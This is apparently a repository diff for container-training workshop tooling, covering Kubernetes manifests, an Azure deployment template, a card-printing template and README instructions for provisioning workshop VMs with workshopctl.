imagePullPolicy: Always
name: socat
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
status: {}
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /api/v1/namespaces/kube-system/services/socat
spec:
externalTrafficPolicy: Cluster
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: socat
sessionAffinity: None
type: NodePort
status:
loadBalancer: {}

View File

@@ -1,11 +0,0 @@
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
name: portworx-replicated
annotations:
storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/portworx-volume
parameters:
repl: "2"
priority_io: "high"

View File

@@ -1,103 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
selector:
matchLabels:
k8s-app: traefik-ingress-lb
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik:1.7
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
namespace: kube-system
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- protocol: TCP
port: 80
name: web
- protocol: TCP
port: 8080
name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ users:jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: users:jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: users:jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users

View File

@@ -1,70 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
annotations:
node: node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
annotations:
node: node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
annotations:
node: node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4

View File

@@ -7,8 +7,8 @@ workshop.
## 1. Prerequisites
Virtualbox, Vagrant and Ansible
- Virtualbox: https://www.virtualbox.org/wiki/Downloads
@@ -25,20 +25,19 @@ Virtualbox, Vagrant and Ansible
$ git clone --recursive https://github.com/ansible/ansible.git
$ cd ansible
$ git checkout stable-{{ getStableVersionFromAnsibleProject }}
$ git checkout stable-2.0.0.1
$ git submodule update
- source the setup script to make Ansible available on this terminal session:
$ source path/to/your-ansible-clone/hacking/env-setup
- you need to repeat the last step every time you open a new terminal session
and want to use any Ansible command (but you'll probably only need to run
it once).
## 2. Preparing the environment
Change into directory that has your Vagrantfile
Run the following commands:
@@ -67,14 +66,6 @@ will reflect inside the instance.
- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed
- If you get an error like "no Vagrant file found" or you have a file but "cannot open base box" when running `vagrant up`,
chances are good you are not in the correct directory.
Make sure you are in the subdirectory named "prepare-local"; it has all the config files required by Ansible, Vagrant, and VirtualBox
- If you are using Python 3.7, running the ansible-playbook provisioning, see an error like "SyntaxError: invalid syntax" and it mentions
the word "async", you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict.
https://github.com/ansible/ansible/issues/42105
- If you get strange Ansible errors about dependencies, try to check your pip
version with `pip --version`. The current version is 8.1.1. If your pip is
older than this, upgrade it with `sudo pip install --upgrade pip`, restart

View File

@@ -1,53 +1,26 @@
# Trainer tools to create and prepare VMs for Docker workshops
These tools can help you to create VMs on:
- Azure
- EC2
- OpenStack
# Trainer tools to create and prepare VMs for Docker workshops on AWS
## Prerequisites
- [Docker](https://docs.docker.com/engine/installation/)
- [Docker Compose](https://docs.docker.com/compose/install/)
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`)
Depending on the infrastructure that you want to use, you also need to install
the Azure CLI, the AWS CLI, or Terraform (for OpenStack deployment).
And if you want to generate printable cards:
- [pyyaml](https://pypi.python.org/pypi/PyYAML)
- [jinja2](https://pypi.python.org/pypi/Jinja2)
You can install them with pip (perhaps with `pip install --user`, or even use `virtualenv` if that's your thing).
These require Python 3. If you are on a Mac, see below for specific instructions on making
Python 3 the default; in particular, if you installed `mosh`, Homebrew
may have changed your default Python to Python 2.
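For reference, one common way to install those two card-generation dependencies (a user-level pip install; adjust to your setup):

```bash
pip install --user pyyaml jinja2
```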
## General Workflow
- fork/clone repo
- create an infrastructure configuration in the `prepare-vms/infra` directory
(using one of the example files in that directory)
- set required environment variables for AWS
- create your own setting file from `settings/example.yaml`
- if necessary, increase allowed open files: `ulimit -Sn 10000`
- run `./workshopctl start` to create instances
- run `./workshopctl deploy` to install Docker and setup environment
- run `./workshopctl kube` (if you want to install and setup Kubernetes)
- run `./workshopctl cards` (if you want to generate a PDF for printing handouts with each user's host IPs and login info)
- run `./workshopctl stop` at the end of the workshop to terminate instances
- run `./workshopctl` commands to create instances, install Docker, set up each user's environment in node1, and perform other management tasks
- run the `./workshopctl cards` command to generate a PDF for printing handouts with each user's host IPs and login info
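Putting the workflow together, a complete session might look like the following sketch (the infra and settings file names are placeholders for your own copies):

```bash
TAG=$(./workshopctl maketag)
./workshopctl start --infra infra/aws-us-west-2 --settings settings/myworkshop.yaml --count 60 --tag $TAG
./workshopctl deploy $TAG
./workshopctl kube $TAG    # only if you want Kubernetes clusters
./workshopctl cards $TAG
# ...deliver the workshop...
./workshopctl stop $TAG
```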
## Clone/Fork the Repo, and Build the Tools Image
The Docker Compose file here is used to build an image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).
$ git clone https://github.com/jpetazzo/container.training
$ cd container.training/prepare-vms
$ git clone https://github.com/jpetazzo/orchestration-workshop.git
$ cd orchestration-workshop/prepare-vms
$ docker-compose build
## Preparing to Run `./workshopctl`
### Required AWS Permissions/Info
@@ -56,74 +29,40 @@ The Docker Compose file here is used to build a image with all the dependencies
- Using a non-default VPC or Security Group isn't supported out of box yet, so you will have to customize `lib/commands.sh` if you want to change that.
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg` which opens up all ports.
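If you'd rather open only those ports instead of running `opensg`, the equivalent AWS CLI calls look roughly like this sketch (targeting the default security group):

```bash
aws ec2 authorize-security-group-ingress --group-name default \
    --protocol tcp --port 22 --cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress --group-name default \
    --protocol tcp --port 8000-8002 --cidr 0.0.0.0/0
```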
### Create your `infra` file
### Required Environment Variables
You need to do this only once. (On AWS, you can create one `infra`
file per region.)
- `AWS_ACCESS_KEY_ID`
- `AWS_SECRET_ACCESS_KEY`
- `AWS_DEFAULT_REGION`
Make a copy of one of the example files in the `infra` directory.
### Update/copy `settings/example.yaml`
For instance:
Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `./workshopctl deploy`, `./workshopctl cards`, etc.
```bash
cp infra/example.aws infra/aws-us-west-2
```
Edit your infrastructure file to customize it.
You will probably need to fill in your cloud provider credentials,
select a region, and so on.
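As a sketch, an AWS infrastructure file ends up looking like this (region and credentials are placeholders):

```bash
INFRACLASS=aws
export AWS_DEFAULT_REGION=us-west-2
export AWS_ACCESS_KEY_ID=AKI...
export AWS_SECRET_ACCESS_KEY=...
```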
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.
### Create your `settings` file
Similarly, pick one of the files in `settings` and copy it
to customize it.
For instance:
```bash
cp settings/example.yaml settings/myworkshop.yaml
```
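As a minimal sketch (assuming just these two keys; real settings files carry more options), you could start with something like:

```bash
cat > settings/myworkshop.yaml <<EOF
clustersize: 3
docker_user_password: training
EOF
```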
You're all set!
./workshopctl cards 2016-09-28-00-33-bret settings/orchestration.yaml
## `./workshopctl` Usage
```
workshopctl - the orchestration workshop swiss army knife
Commands:
build Build the Docker image to run this program in a container
cards Generate ready-to-print cards for a group of VMs
deploy Install Docker on a bunch of running VMs
disableaddrchecks Disable source/destination IP address checks
disabledocker Stop Docker Engine and don't restart it automatically
helmprom Install Helm and Prometheus
help Show available commands
ids (FIXME) List the instance IDs belonging to a given tag or token
kubebins Install Kubernetes and CNI binaries but don't start anything
kubereset Wipe out Kubernetes configuration on all nodes
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
kubetest Check that all nodes are reporting as Ready
listall List VMs running on all configured infrastructures
list List available groups for a given infrastructure
netfix Disable GRO and run a pinger job on the VMs
opensg Open the default security group to ALL ingress traffic
ping Ping VMs in a given tag, to check that they have network access
pssh Run an arbitrary command on all nodes
pull_images Pre-pull a bunch of Docker images
quotas Check our infrastructure quotas (max instances)
remap_nodeports Remap NodePort range to 10000-10999
retag (FIXME) Apply a new tag to a group of VMs
ssh Open an SSH session to the first node of a tag
start Start a group of VMs
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
tags List groups of VMs known locally
test Run tests (pre-flight checks) on a group of VMs
weavetest Check that weave seems properly setup
webssh Install a WEB SSH server on the machines (port 1080)
wrap Run this program in a container
www Run a web server to access card HTML and PDF
ami Show the AMI that will be used for deployment
amis List Ubuntu AMIs in the current region
cards Generate ready-to-print cards for a batch of VMs
deploy Install Docker on a bunch of running VMs
ec2quotas Check our EC2 quotas (max instances)
help Show available commands
ids List the instance IDs belonging to a given tag or token
ips List the IP addresses of the VMs for a given tag or token
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
list List available batches in the current region
opensg Open the default security group to ALL ingress traffic
pull_images Pre-pull a bunch of Docker images
retag Apply a new tag to a batch of VMs
start Start a batch of VMs
status List instance status for a given batch
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
test Run tests (pre-flight checks) on a batch of VMs
```
### Summary of What `./workshopctl` Does For You
@@ -134,78 +73,35 @@ www Run a web server to access card HTML and PDF
- The `./workshopctl` script can be executed directly.
- It will run locally if all its dependencies are fulfilled; otherwise it will run in the Docker container you created with `docker-compose build` (preparevms_prepare-vms).
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
- During `deploy` it will create the `docker` user with password `training`, which is printed on the cards for students. This can be configured with the `docker_user_password` property in the settings file.
- During `deploy` it will create the `docker` user with password `training`, which is printed on the cards for students. For now, this is hard-coded.
### Example Steps to Launch a group of AWS Instances for a Workshop
### Example Steps to Launch a Batch of Instances for a Workshop
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings settings/myworkshop.yaml --count 60` to create 60 EC2 instances
- Run `./workshopctl start N` to create `N` EC2 instances
- Your local SSH key will be synced to instances under `ubuntu` user
- AWS instances will be created and tagged based on date, and their IPs stored in `prepare-vms/tags/`
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
- Run `./workshopctl deploy TAG settings/somefile.yaml` to run `scripts/postprep.rc` via parallel-ssh
- If it errors or times out, you should be able to rerun
- Requires a good connection to run all the parallel SSH connections, up to 100 in parallel (ProTip: create a dedicated management instance in the same AWS region and run all these utilities from it)
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./workshopctl cards TAG` to generate PDF/HTML files to print, cut, and hand out to students
- Run `./workshopctl pull-images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./workshopctl cards TAG settings/somefile.yaml` to generate PDF/HTML files to print, cut, and hand out to students
- *Have a great workshop*
- Run `./workshopctl stop TAG` to terminate instances.
### Example Steps to Launch Azure Instances
## Other Tools
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
- Customize `azuredeploy.parameters.json`
- Required:
- Provide the SSH public key you plan to use for instance configuration
- Optional:
- Choose a name for the workshop (default is "workshop")
- Choose the number of instances (default is 3)
- Customize the desired instance size (default is Standard_D1_v2)
- Launch instances with your chosen resource group name and your preferred region; the examples are "workshop" and "eastus":
```
az group create --name workshop --location eastus
az group deployment create --resource-group workshop --template-file azuredeploy.json --parameters @azuredeploy.parameters.json
```
### Deploying your SSH key to all the machines
The `az group deployment create` command can take several minutes and will only say `- Running ..` until it completes, unless you increase the verbosity with `--verbose` or `--debug`.
- Make sure that you have SSH keys loaded (`ssh-add -l`).
- Source `rc`.
- Run `pcopykey`.
To display the IPs of the instances you've launched:
```
az vm list-ip-addresses --resource-group workshop --output table
```
### Installing extra packages
If you want to put the IPs into `prepare-vms/tags/<tag>/ips.txt` for a tag of "myworkshop":
1) If you haven't yet installed `jq` and/or created your event's tags directory in `prepare-vms`:
```
brew install jq
mkdir -p tags/myworkshop
```
2) And then generate the IP list:
```
az vm list-ip-addresses --resource-group workshop --output json | jq -r '.[].virtualMachine.network.publicIpAddresses[].ipAddress' > tags/myworkshop/ips.txt
```
After the workshop is over, remove the instances:
```
az group delete --resource-group workshop
```
### Example Steps to Configure Instances from a non-AWS Source
- Copy `infra/example.generic` to `infra/generic`
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
- Edit the file `prepare-vms/tags/TAG/ips.txt`, it should list the IP addresses of the VMs (one per line, without any comments or other info)
- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
- Optionally, configure Kubernetes clusters of the size given in the settings: `workshopctl kube TAG`
- Optionally, test your Kubernetes clusters (they may take a little time to become ready): `workshopctl kubetest TAG`
- Generate cards to print and hand out: `workshopctl cards TAG`
- Print the cards file: `prepare-vms/tags/TAG/ips.html`
- Source `postprep.rc`.
(This will install a few extra packages, add entries to
/etc/hosts, generate SSH keys, and deploy them on all hosts.)
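Concretely, a minimal non-AWS session following the steps above might look like this sketch (the IP addresses and the auto-created `TAG` directory name are placeholders):

```bash
cp infra/example.generic infra/generic
./workshopctl start --infra infra/generic --settings settings/myworkshop.yaml
# Launch your VMs by whatever means, then list their IPs, one per line:
cat > tags/TAG/ips.txt <<EOF
203.0.113.10
203.0.113.11
203.0.113.12
EOF
./workshopctl deploy TAG
./workshopctl kube TAG && ./workshopctl kubetest TAG
./workshopctl cards TAG
```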
## Even More Details
@@ -218,7 +114,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.
#### Instance + tag creation
The VMs will be started, with an automatically generated tag (timestamp + your username).
10 VMs will be started, with an automatically generated tag (timestamp + your username).
Your SSH key will be added to the `authorized_keys` of the ubuntu user.
@@ -226,33 +122,35 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.
Following the creation of the VMs, a text file will be created containing a list of their IPs.
This ips.txt file will be created in the $TAG/ directory and a symlink will be placed in the working directory of the script.
If you create new VMs, the symlinked file will be overwritten.
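For instance, after starting a batch you might see something like this (the tag name is illustrative):

```bash
$ readlink ips.txt
tags/2016-09-28-00-33-bret/ips.txt
$ head -2 tags/2016-09-28-00-33-bret/ips.txt
203.0.113.10
203.0.113.11
```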
#### Deployment
Instances can be deployed manually using the `deploy` command:
$ ./workshopctl deploy TAG
$ ./workshopctl deploy TAG settings/somefile.yaml
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
The `postprep.rc` file will be copied via parallel-ssh to all of the VMs and executed.
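Under the hood, that copy-and-execute step boils down to a couple of invocations along these lines (simplified from the `deploy` implementation in `lib/commands.sh`, where `pssh` is the script's parallel-ssh helper):

```bash
pssh -I tee /tmp/postprep.py < lib/postprep.py
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" < ips.txt
```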
#### Pre-pull images
$ ./workshopctl pull_images TAG
$ ./workshopctl pull-images TAG
#### Generate cards
$ ./workshopctl cards TAG
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
If you don't have `wkhtmltopdf` installed, you will get a warning that it is a missing dependency. If you plan to just print the HTML cards, you can ignore this.
$ ./workshopctl cards TAG settings/somefile.yaml
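On Ubuntu, one way to get the PDF toolchain (the same packages the management-instance script in this repo installs) is:

```bash
sudo apt-get install -y wkhtmltopdf xvfb
```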
#### List tags
$ ./workshopctl list infra/some-infra-file
$ ./workshopctl list
$ ./workshopctl listall
#### List VMs
$ ./workshopctl tags
$ ./workshopctl list TAG
This will print a human-friendly list containing some information about each instance.
#### Stop and destroy VMs
@@ -262,32 +160,3 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a m
- Don't write to bash history in system() in postprep
- compose, etc version inconsistent (int vs str)
## Making sure Python3 is the default (Mac only)
Check the `/usr/local/bin/python` symlink. It should be pointing to
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
instructions.
1) Verify that Python 3 is installed.
```
ls -la /usr/local/Cellar/Python
```
You should see one or more versions of Python 3. If you don't,
install it with `brew install python`.
2) Verify that `python` points to Python3.
```
ls -la /usr/local/bin/python
```
If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.
```
rm /usr/local/bin/python
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
# where xxxx is the most recent Python 3 version you saw above
```

View File

@@ -1,250 +0,0 @@
{
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workshopName": {
"type": "string",
"defaultValue": "workshop",
"metadata": {
"description": "Workshop name."
}
},
"vmPrefix": {
"type": "string",
"defaultValue": "node",
"metadata": {
"description": "Prefix for VM names."
}
},
"numberOfInstances": {
"type": "int",
"defaultValue": 3,
"metadata": {
"description": "Number of VMs to create."
}
},
"adminUsername": {
"type": "string",
"defaultValue": "ubuntu",
"metadata": {
"description": "Admin username for VMs."
}
},
"sshKeyData": {
"type": "string",
"defaultValue": "",
"metadata": {
"description": "SSH rsa public key file as a string."
}
},
"imagePublisher": {
"type": "string",
"defaultValue": "Canonical",
"metadata": {
"description": "OS image publisher; default Canonical."
}
},
"imageOffer": {
"type": "string",
"defaultValue": "UbuntuServer",
"metadata": {
"description": "The name of the image offer. The default is Ubuntu"
}
},
"imageSKU": {
"type": "string",
"defaultValue": "16.04-LTS",
"metadata": {
"description": "Version of the image. The default is 16.04-LTS"
}
},
"vmSize": {
"type": "string",
"defaultValue": "Standard_D1_v2",
"metadata": {
"description": "VM Size."
}
}
},
"variables": {
"vnetID": "[resourceId('Microsoft.Network/virtualNetworks',variables('virtualNetworkName'))]",
"subnet1Ref": "[concat(variables('vnetID'),'/subnets/',variables('subnet1Name'))]",
"vmName": "[parameters('vmPrefix')]",
"sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
"publicIPAddressName": "PublicIP",
"publicIPAddressType": "Dynamic",
"virtualNetworkName": "MyVNET",
"netSecurityGroup": "MyNSG",
"addressPrefix": "10.0.0.0/16",
"subnet1Name": "subnet-1",
"subnet1Prefix": "10.0.0.0/24",
"nicName": "myVMNic"
},
"resources": [
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/publicIPAddresses",
"name": "[concat(variables('publicIPAddressName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "publicIPLoop",
"count": "[parameters('numberOfInstances')]"
},
"properties": {
"publicIPAllocationMethod": "[variables('publicIPAddressType')]"
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/virtualNetworks",
"name": "[variables('virtualNetworkName')]",
"location": "[resourceGroup().location]",
"dependsOn": [
"[concat('Microsoft.Network/networkSecurityGroups/', variables('netSecurityGroup'))]"
],
"properties": {
"addressSpace": {
"addressPrefixes": [
"[variables('addressPrefix')]"
]
},
"subnets": [
{
"name": "[variables('subnet1Name')]",
"properties": {
"addressPrefix": "[variables('subnet1Prefix')]",
"networkSecurityGroup": {
"id": "[resourceId('Microsoft.Network/networkSecurityGroups', variables('netSecurityGroup'))]"
}
}
}
]
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/networkInterfaces",
"name": "[concat(variables('nicName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "nicLoop",
"count": "[parameters('numberOfInstances')]"
},
"dependsOn": [
"[concat('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'),copyIndex(1))]",
"[concat('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]"
],
"properties": {
"ipConfigurations": [
{
"name": "ipconfig1",
"properties": {
"privateIPAllocationMethod": "Dynamic",
"publicIPAddress": {
"id": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'), copyIndex(1)))]"
},
"subnet": {
"id": "[variables('subnet1Ref')]"
}
}
}
]
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-12-01",
"type": "Microsoft.Compute/virtualMachines",
"name": "[concat(variables('vmName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "vmLoop",
"count": "[parameters('numberOfInstances')]"
},
"dependsOn": [
"[concat('Microsoft.Network/networkInterfaces/', variables('nicName'), copyIndex(1))]"
],
"properties": {
"hardwareProfile": {
"vmSize": "[parameters('vmSize')]"
},
"osProfile": {
"computerName": "[concat(variables('vmName'),copyIndex(1))]",
"adminUsername": "[parameters('adminUsername')]",
"linuxConfiguration": {
"disablePasswordAuthentication": true,
"ssh": {
"publicKeys": [
{
"path": "[variables('sshKeyPath')]",
"keyData": "[parameters('sshKeyData')]"
}
]
}
}
},
"storageProfile": {
"osDisk": {
"createOption": "FromImage"
},
"imageReference": {
"publisher": "[parameters('imagePublisher')]",
"offer": "[parameters('imageOffer')]",
"sku": "[parameters('imageSKU')]",
"version": "latest"
}
},
"networkProfile": {
"networkInterfaces": [
{
"id": "[resourceId('Microsoft.Network/networkInterfaces', concat(variables('nicName'),copyIndex(1)))]"
}
]
}
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/networkSecurityGroups",
"name": "[variables('netSecurityGroup')]",
"location": "[resourceGroup().location]",
"tags": {
"workshop": "[parameters('workshopName')]"
},
"properties": {
"securityRules": [
{
"name": "default-open-ports",
"properties": {
"protocol": "Tcp",
"sourcePortRange": "*",
"destinationPortRange": "*",
"sourceAddressPrefix": "*",
"destinationAddressPrefix": "*",
"access": "Allow",
"priority": 1000,
"direction": "Inbound"
}
}
]
}
}
],
"outputs": {
"resourceID": {
"type": "string",
"value": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'),'1'))]"
}
}
}

View File

@@ -1,18 +0,0 @@
{
"$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"sshKeyData": {
"value": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXTIl/M9oeSlcsC5Rfe+nZr4Jc4sl200pSw2lpdxlZ3xzeP15NgSSMJnigUrKUXHfqRQ+2wiPxEf0Odz2GdvmXvR0xodayoOQsO24AoERjeSBXCwqITsfp1bGKzMb30/3ojRBo6LBR6r1+lzJYnNCGkT+IQwLzRIpm0LCNz1j08PUI2aZ04+mcDANvHuN/hwi/THbLLp6SNWN43m9r02RcC6xlCNEhJi4wk4VzMzVbSv9RlLGST2ocbUHwmQ2k9OUmpzoOx73aQi9XNnEaFh2w/eIdXM75VtkT3mRryyykg9y0/hH8/MVmIuRIdzxHQqlm++DLXVH5Ctw6a4kS+ki7 workshop"
},
"workshopName": {
"value": "workshop"
},
"numberOfInstances": {
"value": 3
},
"vmSize": {
"value": "Standard_D1_v2"
}
}
}

106
prepare-vms/cards.html Normal file
View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "orchestration workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_swarm -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">training</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

Can't render this file because it contains an unexpected character in line 1 and column 42.

View File

@@ -7,6 +7,15 @@ fi
if id docker; then
sudo userdel -r docker
fi
sudo apt-get update -q
sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
pip install --user awscli jinja2 pdfkit pssh
pip install --user awscli jinja2 pdfkit
sudo apt-get install -y wkhtmltopdf xvfb
tmux new-session \; send-keys "
[ -f ~/.ssh/id_rsa ] || ssh-keygen
eval \$(ssh-agent)
ssh-add
Xvfb :0 &
export DISPLAY=:0
mkdir -p ~/www
sudo docker run -d -p 80:80 -v \$HOME/www:/usr/share/nginx/html nginx
"

View File

@@ -7,6 +7,7 @@ services:
working_dir: /root/prepare-vms
volumes:
- $HOME/.aws/:/root/.aws/
- /etc/localtime:/etc/localtime:ro
- $SSH_AUTH_SOCK:$SSH_AUTH_SOCK
- $PWD/:/root/prepare-vms/
environment:
@@ -14,6 +15,5 @@ services:
AWS_ACCESS_KEY_ID: ${AWS_ACCESS_KEY_ID}
AWS_SECRET_ACCESS_KEY: ${AWS_SECRET_ACCESS_KEY}
AWS_DEFAULT_REGION: ${AWS_DEFAULT_REGION}
AWS_INSTANCE_TYPE: ${AWS_INSTANCE_TYPE}
USER: ${USER}
entrypoint: /root/prepare-vms/workshopctl

View File

@@ -1,10 +0,0 @@
#!/bin/sh
set -e
